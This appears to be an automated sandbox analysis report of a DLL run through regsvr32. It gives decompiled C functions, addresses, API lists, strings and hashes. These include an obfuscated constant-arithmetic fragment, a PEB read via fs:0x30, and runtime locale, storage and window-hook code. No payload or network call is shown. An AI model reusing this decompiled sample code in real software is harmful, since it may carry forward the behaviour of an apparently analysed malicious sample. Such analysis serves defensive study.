				_v8 = 0xc8bfd2;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0x77b2;
				_t69 = 0x16;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x0000123c;
				_v20 = 0x3ff815;
				_v20 = _v20 | 0x9e661a12;
				_v20 = _v20 + 0x3006;
				_v20 = _v20 ^ 0x9e825c55;
				_v12 = 0xda9b76;
				_t70 = 0x6b;
				_v12 = _v12 / _t70;
				_v12 = _v12 | 0xed94e7c2;
				_v12 = _v12 + 0xffffd684;
				_v12 = _v12 ^ 0xed94606e;
				_v16 = 0x191c50;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x00013f6e;
				return E040E648A(_a4, _v20, _v12, _v16, E040F28EB(), _v28);
			}

0x040dc5de
0x040dc5e4
0x040dc5eb
0x040dc5f2
0x040dc5f9
0x040dc600
0x040dc607
0x040dc60b
0x040dc612
0x040dc619
0x040dc61d
0x040dc629
0x040dc62e
0x040dc633
0x040dc63a
0x040dc641
0x040dc648
0x040dc64f
0x040dc656
0x040dc660
0x040dc663
0x040dc666
0x040dc66d
0x040dc674
0x040dc67b
0x040dc682
0x040dc686
0x040dc68a
0x040dc6b7

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction ID: 47070c1a16595fad5dc450f7987eead03f2ea84c65b28a78158223e5793db2c2
Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction Fuzzy Hash: E92100B5D0020DEBDF08DFE1D98A4EEBBB1BB54718F208088D525B6260D7B55B54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 040DF7F7, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E040DF7F7() {

				return  *[fs:0x30];
			}

0x040df7fd

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA3A, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10057a08; // 0x3643b451
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10017BC1(E10027E56, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1000A2DF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1000A8D0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x1000aa3a
0x1000aa3b
0x1000aa41
0x1000aa45
0x1000aa4c
0x1000aa52
0x1000aa59
0x1000aa6a
0x1000aa71
0x1000aa74
0x1000aa77
0x1000aa7a
0x1000aa88
0x1000aa8b
0x1000aa8f
0x1000ab5d
0x1000ac19
0x1000ac1d
0x1000ac31
0x1000ac34
0x1000ac3e
0x1000ac44
0x1000ac5c
0x1000ac68
0x1000ac6d
0x1000ac70
0x1000ac70
0x1000ac3e
0x1000ab63
0x1000ab77
0x1000ab82
0x1000ab98
0x1000aba7
0x1000abbf
0x1000abc4
0x1000abca
0x1000abd6
0x1000abd9
0x1000abeb
0x1000abf7
0x1000abfc
0x1000abff
0x1000abff
0x1000abca
0x1000ac09
0x1000ac09
0x1000ab82
0x1000aa95
0x1000aa9d
0x1000aaa0
0x1000aaa3
0x1000aab5
0x1000aabe
0x1000aac6
0x1000aad3
0x1000aad6
0x1000aadd
0x1000aae1
0x1000aae5
0x1000aae8
0x1000aaeb
0x1000aaf8
0x1000ab04
0x1000ab09
0x1000ab0c
0x1000ab0c
0x1000ab13
0x1000ab13
0x1000ab18
0x1000ab1b
0x1000ab32
0x1000ab39
0x1000ab48
0x1000ac7e
0x1000ac85
0x1000ac95
0x1000ac98
0x1000ac9b
0x1000aca2
0x1000aca5
0x1000acac
0x1000acb8
0x1000acc2
0x1000acc7
0x1000acc7
0x1000accc
0x1000acd1
0x1000acee
0x1000acee
0x1000acf5
0x1000acfa
0x00000000
0x1000acd3
0x1000acd3
0x1000acda
0x1000ace2
0x00000000
0x00000000
0x1000ace4
0x1000ace8
0x00000000
0x00000000
0x00000000
0x1000acea
0x1000acec
0x00000000
0x1000acec
0x1000ab4e
0x1000ab4e
0x1000acfc
0x1000acff
0x1000ad07
0x1000ad08
0x1000ad09
0x1000ad1e
0x1000ad1e

APIs

__EH_prolog3.LIBCMT ref: 1000AA59
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
GetVersion.KERNEL32 ref: 1000AB55
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
_sscanf.LIBCMT ref: 1000ABBF
ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000ABFA
RegCloseKey.ADVAPI32(?), ref: 1000AC09
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000AC6B
_memset.LIBCMT ref: 1000AC85

Strings

GetSystemDefaultUILanguage, xrefs: 1000AACB
GetUserDefaultUILanguage, xrefs: 1000AA82
kernel32.dll, xrefs: 1000AA6C
ntdll.dll, xrefs: 1000AC14
Control Panel\Desktop\ResourceLocale, xrefs: 1000AB6D

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C11B, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1001C11B(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x1005aea4;
					_t40 = TlsSetValue;
					 *0x1005aeb0 = _t7;
					if( *0x1005aea4 == 0) {
						L6:
						 *0x1005aea8 = TlsGetValue;
						 *0x1005aea4 = E1001BDD2;
						 *0x1005aeac = _t40;
						 *0x1005aeb0 = TlsFree;
					} else {
						__eflags =  *0x1005aea8;
						if( *0x1005aea8 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005aeac;
							if( *0x1005aeac == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10057d30 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1005aea8);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10018042();
							 *0x1005aea4 = E1001BD03( *0x1005aea4);
							 *0x1005aea8 = E1001BD03( *0x1005aea8);
							 *0x1005aeac = E1001BD03( *0x1005aeac);
							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
							_t18 = E1001A3D3();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1001BE05();
								goto L15;
							} else {
								_push(E1001BF91);
								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10057d2c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1001E76E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10057d2c);
										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001BE42(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1001BE05();
					return 0;
				}
			}

0x1001c11b
0x1001c127
0x1001c12b
0x1001c14b
0x1001c158
0x1001c165
0x1001c16a
0x1001c16c
0x1001c173
0x1001c179
0x1001c17e
0x1001c196
0x1001c19b
0x1001c1a5
0x1001c1af
0x1001c1b5
0x1001c180
0x1001c180
0x1001c187
0x00000000
0x1001c189
0x1001c189
0x1001c190
0x00000000
0x1001c192
0x1001c192
0x1001c194
0x00000000
0x00000000
0x1001c194
0x1001c190
0x1001c187
0x1001c1ba
0x1001c1c0
0x1001c1c3
0x1001c1c8
0x1001c29a
0x1001c29a
0x1001c29a
0x1001c1ce
0x1001c1d5
0x1001c1d7
0x1001c1d9
0x00000000
0x1001c1df
0x1001c1df
0x1001c1f5
0x1001c205
0x1001c215
0x1001c222
0x1001c227
0x1001c22c
0x1001c22e
0x1001c295
0x1001c295
0x00000000
0x1001c230
0x1001c230
0x1001c241
0x1001c243
0x1001c246
0x1001c24b
0x00000000
0x1001c24d
0x1001c259
0x1001c25b
0x1001c25f
0x00000000
0x1001c261
0x1001c261
0x1001c262
0x1001c276
0x1001c278
0x00000000
0x1001c27a
0x1001c27a
0x1001c27c
0x1001c27d
0x1001c284
0x1001c28a
0x1001c28e
0x1001c292
0x1001c292
0x1001c278
0x1001c25f
0x1001c24b
0x1001c22e
0x1001c1d9
0x1001c29e
0x1001c12d
0x1001c12d
0x1001c135
0x1001c135

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
__mtterm.LIBCMT ref: 1001C12D

Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001E,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
__init_pointers.LIBCMT ref: 1001C1DF
__encode_pointer.LIBCMT ref: 1001C1EA
__encode_pointer.LIBCMT ref: 1001C1FA
__encode_pointer.LIBCMT ref: 1001C20A
__encode_pointer.LIBCMT ref: 1001C21A
__decode_pointer.LIBCMT ref: 1001C23B
__calloc_crt.LIBCMT ref: 1001C254
__decode_pointer.LIBCMT ref: 1001C26E
__initptd.LIBCMT ref: 1001C27D
GetCurrentThreadId.KERNEL32 ref: 1001C284

Strings

KERNEL32.DLL, xrefs: 1001C11C
FlsFree, xrefs: 1001C15F
FlsSetValue, xrefs: 1001C152
FlsAlloc, xrefs: 1001C13D
FlsGetValue, xrefs: 1001C145

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011389, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E10017C2A(E1002866E, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a0f5);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1005acbc;
						if( *0x1005acbc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005a8dc;
								if( *0x1005a8dc != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10011245);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E100174D0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1005a8dc = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E100199C1(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000FB9D(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
							__eflags = _t83 - E1001025C;
							if(_t83 != E1001025C) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000CEFC();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1000A7E1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10017C74(_t94, _t105, _t110);
				}
			}

0x10011389
0x10011389
0x10011389
0x10011393
0x10011398
0x1001139b
0x1001139e
0x100113a8
0x100113ae
0x100113b5
0x100113b7
0x100113ba
0x100113c0
0x100113c2
0x100113c4
0x100113c4
0x100113cd
0x100113e2
0x100113e4
0x100113e7
0x100113ec
0x100113ee
0x100113f2
0x100113f8
0x1001140f
0x1001140f
0x10011416
0x10011463
0x10011463
0x10011465
0x100114cd
0x100114d5
0x10011511
0x1001151d
0x10011524
0x10011556
0x10011559
0x1001155f
0x10011561
0x10011564
0x1001156c
0x10011573
0x10011575
0x10011577
0x1001157e
0x10011586
0x10011588
0x1001158b
0x1001158e
0x1001159c
0x1001159c
0x1001158b
0x10011577
0x100115a2
0x100115a8
0x100115b4
0x100115ba
0x100115c1
0x100115c3
0x100115c8
0x100115ce
0x100115ce
0x100115ce
0x100115ce
0x00000000
0x100115d2
0x00000000
0x10011526
0x100114d9
0x100114e4
0x100114ef
0x100114f5
0x100114fb
0x100114fc
0x100114fe
0x10011506
0x10011509
0x1001150f
0x10011535
0x1001153b
0x1001153d
0x00000000
0x00000000
0x10011547
0x1001154b
0x10011550
0x10011554
0x00000000
0x00000000
0x00000000
0x10011554
0x00000000
0x1001150f
0x1001146d
0x10011472
0x10011479
0x10011482
0x10011498
0x1001149a
0x100114a0
0x100114a2
0x100114a4
0x100114a4
0x100114ac
0x100114b0
0x100114b4
0x100114b8
0x100114be
0x100114c1
0x100114c3
0x100114c3
0x00000000
0x100114b8
0x1001141b
0x10011421
0x10011426
0x00000000
0x00000000
0x1001142c
0x1001142f
0x10011434
0x10011441
0x10011445
0x1001144b
0x1001144b
0x10011454
0x10011459
0x1001145c
0x1001145d
0x00000000
0x00000000
0x00000000
0x1001145d
0x100113fa
0x10011401
0x00000000
0x00000000
0x10011407
0x10011409
0x00000000
0x00000000
0x00000000
0x100113cf
0x100113d7
0x100115d4
0x100115d9
0x100115d9

APIs

__EH_prolog3_GS.LIBCMT ref: 10011393

Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F

CallNextHookEx.USER32 ref: 100113D7

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetClassLongA.USER32 ref: 1001141B
GlobalGetAtomNameA.KERNEL32 ref: 10011445
SetWindowLongA.USER32 ref: 1001149A
_memset.LIBCMT ref: 100114E4
GetClassLongA.USER32 ref: 10011514
GetClassNameA.USER32(?,?,00000100), ref: 10011535
GetWindowLongA.USER32 ref: 10011559
GetPropA.USER32 ref: 10011573
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001157E
